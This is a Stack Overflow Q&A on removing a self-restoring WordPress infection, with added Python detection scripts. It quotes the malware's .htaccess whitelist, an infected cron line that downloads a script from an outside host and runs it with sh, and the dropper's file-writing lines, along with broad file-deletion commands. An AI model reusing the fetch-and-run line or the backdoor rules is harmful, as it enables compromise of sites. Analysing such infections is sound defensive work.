Hacked WordPress .htaccess [closed]
I have a WordPress site that contains a .htaccess file and a file called postfs.php. When I try to delete them, they are written again. I tried deleting all the files on the site, changing permissions, checking the cron... but nothing works. These files reappear as soon as I delete or edit them.
The contents of the files are as follows:
.htaccess:
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp|Php|aspx)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.$
Order allow,deny
Allow from all
</FilesMatch>
AddType application/x-httpd-cgi .sh
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
And postfs.php has this content: PHP Decode
How can I prevent these files from being restored? Has anyone had similar experiences?
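Before touching anything, it helps to know exactly which lines of a .htaccess like the one above are the problem. The following is an added example (not code from the question or any of the answers): a small Python checker that walks the file and reports a `<FilesMatch>` block that re-allows access to script files after a blanket deny, and any `AddType`/`AddHandler`/`SetHandler` line that makes an extra extension execute as a script. The stock WordPress rewrite block is left alone. The question's .htaccess is embedded as it appears above (its second `FilesMatch` pattern is cut off there, so it is cut off here too); the stock block is the one WordPress writes by default. Host-provided handler lines would be reported as well and need a human look.

```python
"""Triage a WordPress .htaccess for the constructs seen in the question."""
import re
from typing import List, Optional

OPEN_RE = re.compile(r'^\s*<FilesMatch\s+"?([^"]*)', re.IGNORECASE)
CLOSE_RE = re.compile(r"^\s*</FilesMatch>", re.IGNORECASE)
ALLOW_RE = re.compile(r"^\s*(Allow\s+from\s+all|Require\s+all\s+granted)\s*$", re.IGNORECASE)
# Pattern text that refers to server-side script files.
SCRIPTY_RE = re.compile(r"php|phtml|\bpy\b|\bsh\b|\bcgi\b|\bpl\b", re.IGNORECASE)
HANDLER_RE = re.compile(r"^\s*(AddType|AddHandler|SetHandler)\s+(\S+)\s+(.*)$", re.IGNORECASE)
EXEC_TYPES = ("application/x-httpd-", "cgi-script")


def audit_htaccess(text: str) -> List[str]:
    """Return one human-readable finding per suspicious construct."""
    findings: List[str] = []
    pattern: Optional[str] = None  # FilesMatch pattern of the block we are inside
    start = 0
    allows = False
    for lineno, line in enumerate(text.splitlines(), 1):
        m = OPEN_RE.match(line)
        if m:
            pattern, start, allows = m.group(1), lineno, False
            continue
        if pattern is not None and CLOSE_RE.match(line):
            # A deny-all on scripts followed by a named allow-list is the tell.
            if allows and SCRIPTY_RE.search(pattern):
                findings.append(
                    f"lines {start}-{lineno}: <FilesMatch> re-allows access to "
                    f"script files matching {pattern!r}; typical backdoor whitelist"
                )
            pattern = None
            continue
        if pattern is not None and ALLOW_RE.match(line):
            allows = True
            continue
        h = HANDLER_RE.match(line)
        if h and h.group(2).lower().startswith(EXEC_TYPES):
            findings.append(
                f"line {lineno}: {h.group(1)} makes {h.group(3).strip()} "
                f"executable as {h.group(2)}"
            )
    return findings


# The .htaccess quoted in the question, copied as it appears there.
QUESTION_HTACCESS = """\
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp|Php|aspx)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.$
Order allow,deny
Allow from all
</FilesMatch>
AddType application/x-httpd-cgi .sh
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
"""

# The rewrite block WordPress writes by default; it should come back clean.
STOCK_WORDPRESS_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

if __name__ == "__main__":
    for name, text in (("question", QUESTION_HTACCESS), ("stock", STOCK_WORDPRESS_HTACCESS)):
        found = audit_htaccess(text)
        print(f"{name}: {len(found)} finding(s)")
        for f in found:
            print("  " + f)
```

Run it over every .htaccess under the document root (there may be thousands, as one answer below notes); a file that reports nothing and matches the stock block can be left in place, everything else is worth reading line by line.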
Solution 1:[1]
I had the same problem; the antivirus was not able to detect it, and the automatic creation of the files was not related to cron jobs, as others mentioned. In fact, every time a page is opened on the site, those files are rebuilt.
I have carefully examined the issue and offer the solution.
The problem occurs for both .htaccess and index.php.
First we search for a keyword in the text of the file:
# grep -lir "wjsindex.php" ./
./wp-admin/images/arrow-rights.png
./wp-includes/images/smilies/icon_crystal.gif
./.htaccess
For the other file, we search for another keyword in the text:
# grep -lir "RZXiMOEbYmVH" ./
./wp-admin/images/arrow-lefts.png
./index.php
./wp-includes/images/smilies/icon_devil.gif
If you look at the contents of these found image files, you will see that they are not images and contain malicious code that exactly matched our two original files.
Sample:
We now search for all four files found:
# grep -lirE "arrow-rights.png|icon_crystal.gif|arrow-lefts.png|icon_devil.gif" ./
./wp-includes/load.php
./wp-includes/template-loader.php
If you edit these two files, at the bottom of load.php and at the beginning of template-loader.php you will see the extra code that needs to be removed (starting with //ckIIbg).
To find out more precisely which sections are correct and which are malicious, just replace that file with the one from another WordPress installation that you are sure is clean and of the same version, or find and remove the extra sections with the diff command.
Thus:
# diff ./wp-includes/load.php ~healthy/www/wp-includes/load.php
# diff ./wp-includes/template-loader.php ~healthy/www/wp-includes/template-loader.php
And as a final step, delete the four malicious image files:
# rm -f ./wp-admin/images/arrow-rights.png ./wp-includes/images/smilies/icon_crystal.gif ./wp-admin/images/arrow-lefts.png ./wp-includes/images/smilies/icon_devil.gif
Edited:
Also check the cron jobs (/var/spool/cron/username) for an infected line like this one and remove it:
* * * * * wget -q -O xxxd http://hello.hahaha666.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home//username/public_html 24 && rm -f xxxd
This code creates a ./css/index.php file, which can be deleted.
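The two grep steps in this answer (find the "image" files that are really PHP, then find the core files that reference them) can be automated over a whole install. The following is an added example, not code from the answer: it checks every file with an image extension against the format's magic bytes, flags files with no valid header or with a PHP open tag hidden behind a valid header, and then lists every .php file that mentions one of the flagged names, which is where the loader code sits (load.php and template-loader.php in the answer). The sample tree and all of its file contents are constructed stand-ins, not the real payload.

```python
"""Find image files that are really PHP, and the PHP files that load them."""
import os
from typing import Dict, List, Optional

# Magic bytes for the raster formats WordPress ships.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".ico": (b"\x00\x00\x01\x00",),
    ".bmp": (b"BM",),
}
PHP_OPEN_TAGS = (b"<?php", b"<?=")


def classify_image(path: str, data: bytes) -> Optional[str]:
    """Return a reason if `path` claims to be an image but is not one, else None."""
    ext = os.path.splitext(path)[1].lower()
    sigs = MAGIC.get(ext)
    if sigs is None:
        return None  # not an image extension; out of scope for this check
    if not any(data.startswith(s) for s in sigs):
        return f"no {ext} header (starts with {data[:8]!r})"
    if any(tag in data for tag in PHP_OPEN_TAGS):
        return f"valid {ext} header but contains a PHP open tag (polyglot)"
    return None


def find_loaders(files: Dict[str, bytes], names: List[str]) -> Dict[str, List[str]]:
    """Map each suspicious basename to the .php files that mention it (the grep -lirE step)."""
    hits: Dict[str, List[str]] = {}
    for name in names:
        needle = os.path.basename(name).encode()
        hits[needle.decode()] = sorted(
            p for p, d in files.items() if p.lower().endswith(".php") and needle in d
        )
    return hits


def scan_tree(files: Dict[str, bytes]) -> Dict[str, object]:
    """Run both checks over a {relative_path: bytes} tree."""
    disguised: Dict[str, str] = {}
    for path, data in files.items():
        reason = classify_image(path, data)
        if reason:
            disguised[path] = reason
    return {"disguised": disguised, "loaders": find_loaders(files, list(disguised))}


def load_tree(root: str) -> Dict[str, bytes]:
    """Read a real WordPress directory into the dict form scan_tree expects."""
    files: Dict[str, bytes] = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            with open(full, "rb") as fh:
                files[os.path.relpath(full, root)] = fh.read()
    return files


# Constructed sample tree: one real PNG header, two fake images, and two core
# files carrying a stub of the loader line the answer says to look for.
SAMPLE_TREE: Dict[str, bytes] = {
    "wp-content/uploads/2021/logo.png": b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR",
    "wp-admin/images/arrow-rights.png": b"<?php /* constructed stand-in for the stored payload */\n",
    "wp-includes/images/smilies/icon_devil.gif": b"GIF89a<?php /* constructed polyglot */\n",
    "wp-includes/load.php": (
        b"<?php\n// normal core code would be here\n"
        b"//ckIIbg constructed loader stub\n"
        b"$p = 'wp-admin/images/arrow-rights.png';\n"
    ),
    "wp-includes/template-loader.php": (
        b"<?php\n//ckIIbg constructed loader stub\n"
        b"$p = 'wp-includes/images/smilies/icon_devil.gif';\n"
    ),
    "index.php": b"<?php\nrequire __DIR__ . '/wp-blog-header.php';\n",
}

if __name__ == "__main__":
    import json
    print(json.dumps(scan_tree(SAMPLE_TREE), indent=2))
```

On a real site call `scan_tree(load_tree("/path/to/public_html"))`; the "loaders" list tells you which core files to diff against a clean copy, and the "disguised" list is what to remove after you have saved a copy for the record.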
Solution 2:[2]
If files keep reappearing after you delete them, you should look out for lines of code, often in the index.php file, where a time limit or a TTL (Time To Live) is specified, along with a (most of the time) very long line of base64 code. (These are often recognizable by a couple of shorter lines of code with 'equal-to' signs in the middle.) The way this works is that the time limit / TTL makes sure all files are checked against a reference set of files located either at another URL or in the web server's cache, and if one is missing it syncs itself back.
One thing you can do to solve this is delete the script and restart Apache and PHP / nginx. This clears the web server's cache. After that you can clean out the malicious deny/allow rules and other stuff in the .htaccess files, and probably other things lurking between the files and folders of your web application.
Bonus suggestions to really try and solve the actual security issue here:
Always make sure ALL software / plugins / modules / themes / etc. is up to date. Don't miss out on any security patches!
Make sure to change every password on every account providing access to your webapplication. (don't forget the FTP accounts and backend panels and stuff).
Try to run a malware scan (if you have a shared hosting package you might do so through a security plugin, or ask your hosting company to run one).
Make sure there aren't any users, plugins, or any other possibly malicious components you've never heard of and haven't installed!
At least make sure to check the root folder, all upload folders, and the temporary folders for malicious files.
I hope this helps out others with similar issues!
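The three signals this answer describes (a very long base64 line, decode/eval-style calls, and a time limit that lets the script keep running after the request) can be checked mechanically. The following is an added example and not code from the answer: a Python scorer that reports, per line of a PHP file, which of those signals it trips, plus a yes/no verdict when a blob and a decode or persistence call occur together. The thresholds (a 200-character base64 run) and the two sample files are constructed; the "infected" sample carries a harmless encoded text blob, not a real payload.

```python
"""Spot the obfuscated, self-restoring PHP pattern described in the answer."""
import base64
import os
import re
from typing import Dict, List, Tuple

BASE64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")
DECODE_CALLS = (b"eval(", b"base64_decode(", b"gzinflate(", b"gzuncompress(",
                b"str_rot13(", b"create_function(")
PERSIST_CALLS = (b"set_time_limit(", b"ignore_user_abort(")


def suspicious_php_lines(data: bytes) -> List[Tuple[int, str]]:
    """Return (line number, reason) for each line that trips a signal."""
    hits: List[Tuple[int, str]] = []
    for n, line in enumerate(data.split(b"\n"), 1):
        reasons: List[str] = []
        m = BASE64_RUN.search(line)
        if m:
            reasons.append(f"base64-looking run of {len(m.group())} chars")
        reasons += [f"calls {c.decode()[:-1]}" for c in DECODE_CALLS if c in line]
        reasons += [f"calls {c.decode()[:-1]} (survives the request)"
                    for c in PERSIST_CALLS if c in line]
        if reasons:
            hits.append((n, "; ".join(reasons)))
    return hits


def is_likely_dropper(data: bytes) -> bool:
    """A blob plus a decode or persistence call is the combination worth pulling."""
    reasons = " ".join(r for _, r in suspicious_php_lines(data))
    has_blob = "base64-looking" in reasons
    has_code = any(c.decode()[:-1] in reasons for c in DECODE_CALLS + PERSIST_CALLS)
    return has_blob and has_code


def scan_directory(root: str) -> Dict[str, List[Tuple[int, str]]]:
    """Report every .php file under root that is_likely_dropper flags."""
    report: Dict[str, List[Tuple[int, str]]] = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if not fn.lower().endswith(".php"):
                continue  # long base64 is normal in CSS/JS data URIs, so stay with PHP
            full = os.path.join(dirpath, fn)
            with open(full, "rb") as fh:
                data = fh.read()
            if is_likely_dropper(data):
                report[os.path.relpath(full, root)] = suspicious_php_lines(data)
    return report


# Constructed samples. The blob is base64 of plain text, standing in for the
# long line the answer describes.
BLOB = base64.b64encode(b"constructed payload stand-in, not real code. " * 8)
INFECTED_SAMPLE = (
    b"<?php\n"
    b"@ignore_user_abort(true); @set_time_limit(0);\n"
    b"$ttl = 3600; // constructed: the re-check interval the answer calls a TTL\n"
    b"$x = base64_decode('" + BLOB + b"');\n"
)
CLEAN_SAMPLE = (
    b"<?php\n"
    b"/**\n * Front to the WordPress application.\n */\n"
    b"define( 'WP_USE_THEMES', true );\n"
    b"require __DIR__ . '/wp-blog-header.php';\n"
)

if __name__ == "__main__":
    for name, sample in (("infected", INFECTED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(name, is_likely_dropper(sample), suspicious_php_lines(sample))
```

A hit is a reason to read the file, not proof by itself: some plugins legitimately call `base64_decode` on short strings, which is why the verdict requires the long blob as well. Files that trip the verdict are the ones to copy aside and remove before restarting the web server and PHP, as the answer suggests.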
Solution 3:[3]
We had the exact same hack a while ago. The first step is to decode the index.php file; after decoding we see that there are 4 infected image files:
file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
file_put_contents("wp-admin/images/arrow-rights.png", $ht_content);
file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content);
file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content);
First delete the 4 infected images, and check your cron and delete any cron job you didn't create.
Run this over SSH to delete all .htaccess files within all subdirectories:
find . -type f -perm 0444 -name ".htaccess" -exec echo rm {} \;
Use the default WordPress .htaccess and index.php files.
After finishing, you can install wordfence, and activate the firewall, also don't forget to update your wordpress core, plugins, and themes.
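Both this answer and Solution 1 end up comparing the install against a clean copy of the same WordPress version, either file by file with diff or by replacing wp-admin and wp-includes wholesale. The following is an added example, not code from either answer: it hashes both trees with SHA-256 and reports core files that differ, files that exist only in the install (where droppers such as the css/index.php from Solution 1 and stray .htaccess files turn up) and files missing from the install. wp-config.php and everything under wp-content/ are site-specific and skipped. The reference tree is meant to be an unpacked official download of the same version; the two small trees below are constructed.

```python
"""Compare a WordPress install against a clean copy of the same version."""
import hashlib
import os
from typing import Dict, List

SKIP_EXACT = {"wp-config.php"}
SKIP_PREFIXES = ("wp-content/",)


def _skip(path: str) -> bool:
    """Site-specific paths that cannot be compared against the stock download."""
    return path in SKIP_EXACT or path.startswith(SKIP_PREFIXES)


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def hash_tree(files: Dict[str, bytes]) -> Dict[str, str]:
    """{relative path: bytes} -> {relative path: sha256}, skipping site-specific paths."""
    return {p: sha256(d) for p, d in files.items() if not _skip(p)}


def hash_dir(root: str) -> Dict[str, str]:
    """Same as hash_tree, but reading a real directory; paths use '/' so they compare."""
    out: Dict[str, str] = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if _skip(rel):
                continue
            with open(full, "rb") as fh:
                out[rel] = sha256(fh.read())
    return out


def compare_hashes(installed: Dict[str, str], reference: Dict[str, str]) -> Dict[str, List[str]]:
    """Three sorted lists: modified core files, files only in the install, files only in the reference."""
    return {
        "modified": sorted(p for p in installed if p in reference and installed[p] != reference[p]),
        "extra": sorted(p for p in installed if p not in reference),
        "missing": sorted(p for p in reference if p not in installed),
    }


def compare_trees(installed: Dict[str, bytes], reference: Dict[str, bytes]) -> Dict[str, List[str]]:
    return compare_hashes(hash_tree(installed), hash_tree(reference))


# Constructed trees: the reference stands in for the official download, the
# install has one appended loader, one rogue .htaccess and one dropped file.
REFERENCE: Dict[str, bytes] = {
    "index.php": b"<?php\nrequire __DIR__ . '/wp-blog-header.php';\n",
    "wp-includes/load.php": b"<?php\n// constructed stand-in for the clean file\n",
    "wp-includes/template-loader.php": b"<?php\n// constructed stand-in for the clean file\n",
    "wp-config-sample.php": b"<?php\n// constructed\n",
}
INSTALLED: Dict[str, bytes] = {
    "index.php": REFERENCE["index.php"],
    "wp-includes/load.php": REFERENCE["wp-includes/load.php"] + b"//ckIIbg constructed appended loader\n",
    "wp-includes/template-loader.php": REFERENCE["wp-includes/template-loader.php"],
    "wp-config.php": b"<?php\n// site specific, skipped\n",
    "wp-content/themes/x/functions.php": b"<?php\n// site specific, skipped\n",
    ".htaccess": b"AddType application/x-httpd-cgi .sh\n",
    "css/index.php": b"<?php\n// constructed dropper stand-in\n",
}

if __name__ == "__main__":
    for key, paths in compare_trees(INSTALLED, REFERENCE).items():
        print(f"{key}: {paths}")
```

On a real site run `compare_hashes(hash_dir("/path/to/public_html"), hash_dir("/path/to/unpacked/wordpress"))`. The "modified" list is what to diff by hand or overwrite from the download; "extra" outside wp-content is almost always either a legitimate .htaccess (compare it with the stock rewrite block) or something to remove; wp-content still needs the separate checks for disguised images and obfuscated PHP.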
Solution 4:[4]
In the first step, you should find the shell file (your host provider can do it with antisheller).
1. Remove unused themes and plugins in WordPress.
2. Log in over SSH and run this command: `find /home/.../wordpres_directory -type f -name ".htaccess" -delete`
3. Open the update page with this link: yourdomain.tld/wp-admin/update-core.php?action=do-core-reinstall
If you still see the problem, repeat steps 2 and 3.
Your server needs a security config; call your host provider to secure the server.
Solution 5:[5]
You must search for every .htaccess file, using an FTP client, and delete it (almost 5000 in my case). Upgrade plugins to close the security breaches.
Solution 6:[6]
Dunno if this is still active, but if someone comes across this, this was how I solved it:
- First isolated the website to my IP so I could work alone.
- Removed the WP install, kept wp-content.
- Updated WP manually through FTP.
- Repaired / recreated the DB.
- Deactivated all plugins.
- Disabled themes; the simplest way is just to temporarily rename the themes folder to _themes instead of themes.
- Updated all plugins.
- Checked the active theme folder for changed dates. Found a folder in my inc folder that had an index.php and a forge.php. Removed those.
- Lastly checked the root folder again. Found a folder called CSS; removed that as well since it also had PHP files that did not belong.
- Removed .htaccess files according to the above.
- Recreated the .htaccess file.
- Activated all plugins and themes.
- Checked once more for file changes in case I had missed anything.
- Allowed traffic to the site once more and kept an eye on access.log for weird requests.
Maybe it doesn't help everyone, but this worked fine for me and no traces are left.
GLHF!
Solution 7:[7]
Ultimately, none of them work. Follow this option and keep monitoring the .htaccess and index.php files in the respective domain folder where you see this issue.
- Don't uninstall / drop the WordPress installation. All the records stored will be gone.
- Take a backup of the DB from MySQL, by looking for the DB mapped to the domain.
- Now create a new sub-domain.
- Install WordPress mapped to the sub-domain.
- Import the DB into the newly created DB [against the new WP instance].
- Create the respective views... you will have to open the SQL file, change the user / DB name against the views created, and restore them manually.
- Once all of the above is done, open the table wpxx_options and update the 2 records with the new sub-domain name.
- Now go to WP and add the theme which you had installed earlier [don't use a new one].
- Install only the required plugins, not all of them as in the earlier installation.
- Go to the wp_content folder [from the earlier installation], get all the media files and copy them to the new wp_content folder (I mean the [1999, 2000, 20xx...] folders, not everything).
- Finally go to your wp-config.php and change the table prefix to the new one: //$table_prefix = 'wpxx_'; //old one $table_prefix = 'wp1234_'; // new one
With this I think it should work.
I had tried removing the files and uninstalling everything, including the domain, and restoring... the same junk info gets written to the two files [.htaccess and index.php], so I had to follow the above steps. It's working for now; I have to keep monitoring the above files. Hope it works for you too. If you have additional findings, do update here.
Solution 8:[8]
You might have a cron job that keeps adding the .htaccess files; look out for a cron job with a wget request to hello.turnedpro.xyz.
If you are using cPanel, you can reset your cPanel account password and run an anti-malware scan for any keyloggers/malware, e.g. RedLine stealer.
Solution 9:[9]
I had the very same problem. In my case, I had several WP sites under one user, which is very convenient for me to maintain the sites, but made the clean-up more tricky, sort of a whack-a-mole situation.
Both the malicious .htaccess and index.php were regenerating as soon as they were deleted. What I did was look for all the radio.php and about.php files with malicious code (easy to find because they are bigger in size and out of place) and also found some folders called "maint" with files with malicious code. After cleaning this, the infected .htaccess and index.php did not regenerate anymore, so after copying the fresh WP files everything was fine, and I was able to access wp-admin correctly.
In one particular WP folder, even after deleting all the files, the infected .htaccess and index.php files were still regenerating, so what I did was delete the root folder containing the WP install and create a new one with a different name, and after pointing the domain name to the new folder, voila! All fine!
Solution 10:[10]
Today I found an infected WordPress 5.7.5; all .htaccess files had permissions for malicious files in the whole menu panel. I backed up everything, found several files with strange names that were infected in the root and other locations and removed them, changed all the passwords, downloaded the official WordPress 5.7.5 installation, deleted the wp-admin folder and uploaded the one from the official installation. With this the panel returned to normal and I could update all the plugins. I did the same with wp-includes; for wp-content I asked the hosting to run the find command to delete all .htaccess files, and then I upgraded to a new version.
Solution 11:[11]
I solved the problem.
Create a new FTP account and edit .htaccess and index.php with FileZilla. Then you should delete wp-admin and upload the new files and folders from the new WordPress version, also wp-includes. And then you can
Sources
This article follows the attribution requirements of Stack Overflow and is licensed under CC BY-SA 3.0.
Source: Stack Overflow